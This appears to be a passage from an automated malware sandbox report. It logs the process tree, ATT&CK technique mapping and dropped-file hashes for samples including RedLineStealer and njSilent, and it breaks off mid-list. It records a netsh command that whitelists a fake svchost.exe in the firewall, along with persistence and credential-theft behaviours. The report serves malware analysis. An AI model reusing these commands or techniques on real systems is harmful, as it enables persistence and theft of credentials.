                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:1432
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:976
                                                                                                                                                            • C:\Users\Admin\Downloads\another_trash_malware\another trash malware\random.exe
                                                                                                                                                              random.exe
                                                                                                                                                              2⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:5700
                                                                                                                                                            • C:\Users\Admin\Downloads\another_trash_malware\another trash malware\RedLineStealer.exe
                                                                                                                                                              RedLineStealer.exe
                                                                                                                                                              2⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:3028
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3720
                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:3568
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3028 -s 356
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:2896
                                                                                                                                                              • C:\Users\Admin\Downloads\another_trash_malware\another trash malware\njSilent.exe
                                                                                                                                                                njSilent.exe
                                                                                                                                                                2⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:536
                                                                                                                                                                • C:\Windows\svchost.exe
                                                                                                                                                                  "C:\Windows\svchost.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Drops startup file
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                  • Drops autorun.inf file
                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:4596
                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                    netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:5644
                                                                                                                                                              • C:\Windows\system32\msg.exe
                                                                                                                                                                msg * ur pc is getting infected...
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4792
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3028 -ip 3028
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1604
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 232 -p 3104 -ip 3104
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1148
                                                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:3560
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:5596
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3712
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2916
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3004 -ip 3004
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1428
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 232 -p 2764 -ip 2764
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4540
                                                                                                                                                                          • C:\Windows\System32\spoolsv.exe
                                                                                                                                                                            C:\Windows\System32\spoolsv.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:2412
                                                                                                                                                                            • C:\Windows\System32\msiexec.exe
                                                                                                                                                                              msiexec.exe
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:7784
                                                                                                                                                                              • C:\Windows\System32\msiexec.exe
                                                                                                                                                                                msiexec.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:6948
                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                  svchost.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:7208
                                                                                                                                                                                • C:\Windows\System32\msiexec.exe
                                                                                                                                                                                  msiexec.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5252
                                                                                                                                                                                  • C:\Windows\System32\msiexec.exe
                                                                                                                                                                                    msiexec.exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:8088
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7536 -ip 7536
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:7696
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7932 -ip 7932
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:1620
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:2968

                                                                                                                                                                                      Network

                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                      Reconnaissance

                                                                                                                                                                                      Resource Development

                                                                                                                                                                                      Initial Access

                                                                                                                                                                                      Replication Through Removable Media

                                                                                                                                                                                      1
                                                                                                                                                                                      T1091

                                                                                                                                                                                      Execution

                                                                                                                                                                                      Command and Scripting Interpreter

                                                                                                                                                                                      1
                                                                                                                                                                                      T1059

                                                                                                                                                                                      PowerShell

                                                                                                                                                                                      1
                                                                                                                                                                                      T1059.001

                                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053.005

                                                                                                                                                                                      Persistence

                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                      1
                                                                                                                                                                                      T1197

                                                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                                                      1
                                                                                                                                                                                      T1547

                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                      1
                                                                                                                                                                                      T1547.001

                                                                                                                                                                                      Create or Modify System Process

                                                                                                                                                                                      1
                                                                                                                                                                                      T1543

                                                                                                                                                                                      Windows Service

                                                                                                                                                                                      1
                                                                                                                                                                                      T1543.003

                                                                                                                                                                                      Event Triggered Execution

                                                                                                                                                                                      2
                                                                                                                                                                                      T1546

                                                                                                                                                                                      Component Object Model Hijacking

                                                                                                                                                                                      1
                                                                                                                                                                                      T1546.015

                                                                                                                                                                                      Netsh Helper DLL

                                                                                                                                                                                      1
                                                                                                                                                                                      T1546.007

                                                                                                                                                                                      Modify Authentication Process

                                                                                                                                                                                      1
                                                                                                                                                                                      T1556

                                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053.005

                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                                                      1
                                                                                                                                                                                      T1547

                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                      1
                                                                                                                                                                                      T1547.001

                                                                                                                                                                                      Create or Modify System Process

                                                                                                                                                                                      1
                                                                                                                                                                                      T1543

                                                                                                                                                                                      Windows Service

                                                                                                                                                                                      1
                                                                                                                                                                                      T1543.003

                                                                                                                                                                                      Event Triggered Execution

                                                                                                                                                                                      2
                                                                                                                                                                                      T1546

                                                                                                                                                                                      Component Object Model Hijacking

                                                                                                                                                                                      1
                                                                                                                                                                                      T1546.015

                                                                                                                                                                                      Netsh Helper DLL

                                                                                                                                                                                      1
                                                                                                                                                                                      T1546.007

                                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053.005

                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                      1
                                                                                                                                                                                      T1197

                                                                                                                                                                                      Impair Defenses

                                                                                                                                                                                      1
                                                                                                                                                                                      T1562

                                                                                                                                                                                      Disable or Modify System Firewall

                                                                                                                                                                                      1
                                                                                                                                                                                      T1562.004

                                                                                                                                                                                      Modify Authentication Process

                                                                                                                                                                                      1
                                                                                                                                                                                      T1556

                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                      2
                                                                                                                                                                                      T1112

                                                                                                                                                                                      Subvert Trust Controls

                                                                                                                                                                                      1
                                                                                                                                                                                      T1553

                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                      1
                                                                                                                                                                                      T1553.004

                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                      2
                                                                                                                                                                                      T1497

                                                                                                                                                                                      Credential Access

                                                                                                                                                                                      Credentials from Password Stores

                                                                                                                                                                                      1
                                                                                                                                                                                      T1555

                                                                                                                                                                                      Credentials from Web Browsers

                                                                                                                                                                                      1
                                                                                                                                                                                      T1555.003

                                                                                                                                                                                      Modify Authentication Process

                                                                                                                                                                                      1
                                                                                                                                                                                      T1556

                                                                                                                                                                                      Steal Web Session Cookie

                                                                                                                                                                                      1
                                                                                                                                                                                      T1539

                                                                                                                                                                                      Unsecured Credentials

                                                                                                                                                                                      6
                                                                                                                                                                                      T1552

                                                                                                                                                                                      Credentials In Files

                                                                                                                                                                                      5
                                                                                                                                                                                      T1552.001

                                                                                                                                                                                      Credentials in Registry

                                                                                                                                                                                      1
                                                                                                                                                                                      T1552.002

                                                                                                                                                                                      Discovery

                                                                                                                                                                                      Browser Information Discovery

                                                                                                                                                                                      1
                                                                                                                                                                                      T1217

                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                      1
                                                                                                                                                                                      T1120

                                                                                                                                                                                      Process Discovery

                                                                                                                                                                                      1
                                                                                                                                                                                      T1057

                                                                                                                                                                                      Query Registry

                                                                                                                                                                                      9
                                                                                                                                                                                      T1012

                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                      6
                                                                                                                                                                                      T1082

                                                                                                                                                                                      System Location Discovery

                                                                                                                                                                                      1
                                                                                                                                                                                      T1614

                                                                                                                                                                                      System Language Discovery

                                                                                                                                                                                      1
                                                                                                                                                                                      T1614.001

                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                      2
                                                                                                                                                                                      T1497

                                                                                                                                                                                      Lateral Movement

                                                                                                                                                                                      Replication Through Removable Media

                                                                                                                                                                                      1
                                                                                                                                                                                      T1091

                                                                                                                                                                                      Collection

                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                      5
                                                                                                                                                                                      T1005

                                                                                                                                                                                      Email Collection

                                                                                                                                                                                      1
                                                                                                                                                                                      T1114

                                                                                                                                                                                      Command and Control

                                                                                                                                                                                      Web Service

                                                                                                                                                                                      1
                                                                                                                                                                                      T1102

                                                                                                                                                                                      Exfiltration

                                                                                                                                                                                      Impact

                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                      Downloads

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        40B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        8b8151201f05f4a807d6c9815dc6d32c

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        fbc10bcc12c21bb1aff950023a42dd301da51041

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        64def2b52d29376ca2f2617f8269c0a029e2124ae9184de6a5ccc65a25581d7f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        fb0f7db75aac137c7b4f95041c8452f66fe1ed6f4de132f48eadfbc3385933d6f35e5ae105ae090cb2a96f4bed46a67bdd3b4818ed2d2549ddd38d7b46917f5a

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        d751713988987e9331980363e24189ce

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        284B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        837a8025f970e9cc684ce417403968d4

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b3e1fda7f610ba208db91bf493cc1741c0f3153d

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        2cf1da745c2c3a35a20d4e69436ef4bd50e1fe452798ed40c92a5bb5d41d2ca3

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        e9b5ecffa0eb5ada2014ea7f4d0091585ea2839e43b75333ce50c40e64c74a95224aba9e109093a8fd42433650c6843e674492375e24845216564c26d096c184

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        552B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        b4c9087ffa8db423c0f905c308d85b20

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        2c2e808f974aea85fed53ba5ae4905c0db416a70

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        1f98faacb7b64ab83b0ffe9517696e8bc4121e03e21dbf6b47b56f3f2d007a3b

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        7ca4fd5e9f49106e8a795167133e61bf49035e3bc080206079177cd11b352b1c441cf6f7e9d6a17e0be465df10e1eb81e73ba75adbd1672419d3d9c604a3d4fb

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\69125af5-b370-44b3-9fbf-87852eb43a33.dmp
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.6MB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        9a3e83cbd909d12298c27d0e35abcb8a

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        74aac2f7b624f6e6ceb42d463772360009343d9b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        9cdedc19e874d55e32bb2139d047a1ebbd541ae3d3f809832012d010d25d4715

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        ca0563936c4e4f5a7f814e208658374f18e313b8324b757e51fccf7afb680eafafbaaafc9a7c58ad43974cf42f629c2fd2556c5738334fd25891ff41fc2d31c9

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\91f760db-4786-42d1-94e2-7952cf150b7a.dmp
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.4MB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        d7491a0f7b8ac32e0601e339fb2ee711

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        3e6f461858284270761b3d4596ece17fab75cf60

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        8c2378b134703e2667ccc940f08eb1493f1dcff3a813cef6b5538879a9298d2c

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        7c0247fb56cd6103a23da0b8ed664ec1837d1947c1a58f675db4c8e70551c08f05f4527ed4e96770bcfec9cf50054856e2bf18dedee2daf7ae3fbab090e0ee13

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\960efcb6-4adf-44cd-aaa7-ea9a314c6a18.dmp
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.5MB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        9d85e998cd3567108de47878b391fcc8

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        a248196eeb0545384769b9355cc119bbe5f5485b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        859da4293566cd06debe604a229b51da68afd723f5c72e6f723cdb964facc801

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        bc284142795272eaf64b3d415c87b23621f8925119d900246f099d9be3ac0dd48d4efd1094d438626283cb6dc8ffb71ce27fc54aa7662897f9713186eb1024a1

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\a6e0afac-6816-418f-9e9e-3d34904b7d9f.dmp
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.4MB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        47ba827f8492c32188e838e616745b92

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        9dc1373c47570188c4c0ece05834e86b0aecfb4e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        4d7d6e4e76cc0d709d652e058ccb1afb4927ac9a539041014c634488f32dc2e8

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        e41f8dc3718a87ed57509e966ca75e01d6a65e0069fd01677b0960f81a3c0a3a1d98f7c8f7a1bd520ad8c7381c8646274c157f04f081fd2a62d3c2a24f061984

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        152B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        36ff901d24b6e4ae36066cda9407e89c

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        ba13ae68c6b2f884b325815d56c16d540d478a68

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        757f0ff921c22952e9f85561b50d76c02bf98e73cbf122062e01440476c3dd1f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        6b4ee391bb4bc7ff29fc31aad65c81097e6f58d2528c02318ac7513e883741340c046169461761557f626b238bb4f5f898081ea2767b71f5203565c01de65d36

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        152B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        71bfb1a7582a8ffe9a0d10157a9dd0b3

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        84495861e5b2cb58fbf7843d86eb2dfc00fce971

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        9c622edcaa132ea4dffd2ee0ca9b03db00553a20a895f45bce9d70af49a8577e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        fa7f35494e02c13cc4e041424ceaee7c953c31242ddc681c9b196a252d5e144cbb28183d005ee69cd8c1c6080ff92a4024e52b9e0a24a2184be2dd468b8a6d29

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        152B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        56b88c052c247ffe0b476ec079b68d26

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        f5c0ecc4db1d6d83c9b1211103923b5dcb422a00

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        1a03ef362174c9a3f5863436aadb8f8430dd6639bfb6c3bbf57a9d8a502e12ed

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        29f4f422a90dbf625d1b31a9f4a13fcc116fb489bc42d5cc2e504df89bc2d2ab4f9e63812232a30342b36d1bcde009605ff2f44521654c7e9d1e496bfb00efcc

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        152B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        548e203b1aa450b7449ce3fe3ef010b1

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        27386a95f152359a1ef041c74fcacc9620d4387e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        5a45e20627f785095fe45b26f8fabd49490440d1810a9be969893c6a47ad2b1d

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        01198a497b1bb42e1de48d8290e2f93f4ca0ac189b5dbc1a66d433182d8937beadb35e6a7ffee16e828e1618fdef6ade466a278f73bc4c01ea1a40a7d452595f

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        111B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        285252a2f6327d41eab203dc2f402c67

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        5KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        491fd388e9c295203a9eb1c15a4fc6e3

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        e259470e34b64190c282648a6cb1470ac2c84756

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        c71e804f8a90ae454c060dd137ad4ffe805d2916a6530064b81f3c0ab1325c97

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        17fc58fb521e374a4f0e881edbeec09ec8ab8c972c26e71ee5e501acaa3a9fbcc955b747f74f695c54c77ed790693255dde4681932d62c5472686aa939491c2b

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        5KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        d745302b263427efddd8f4bd7a4b690e

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        354197a7a04565aafff5d0fc883ae19fa7291bf9

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        54712ee84ea5b6ff58efa071c74d9237d40955edcc96f1a1adae252b4fb1c084

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        666d677f320f7bbb46c7f99507cc528fb4d3070bdc97c5fa21ed696829721b39813837dedd5423ad7b799dc9b771576c0c783caca6b20e256e1a5d531367a9ea

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        5KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        8cc78a80e2c8c39694fd2271fd20b421

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        cc4327b444576d2806939a4646d9face5af506ad

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        8b7c5ba3f7abe7115cd31dae75897136fea670d322f758daa5cc7b6a146c4900

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        9448ce1dbbb6f304607838c5a7a8061ac5ae22eb13c906d5af0786eeab7d38bf19b03bfcd1fde8a3dcc91d5108b806f6abaf001f6c777c4109d5421c8d68db7d

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        5KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        4c1eadb37617b928b1c6e550f50ce919

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        00bcb7593741ad9bd104da53cd5e13068d654ac1

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        4c1c385c379fbe652ea682cd574e3bf7f259d3a6912dfb5220f8d6a110d40259

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        35ba769e671a4c7c5100c470bb0ddddb9e358c762ac939b3605b156cd097ca82ff77a2411e4c4317d4d3b65b8207feec7b2f82f6f13184daa202eef52de7871f

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a55ed5cd-a3a2-4de5-b927-828528742dc0.tmp
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        5058f1af8388633f609cadb75a75dc9d

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        264KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                                                                        Download Submit

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\17peiyj1.default-release\activity-stream.discovery_stream.json
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        18KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        ea85b8aa7ba1a4edaf7bd151950c8be5

                                                                                                                                                                                        SHA1

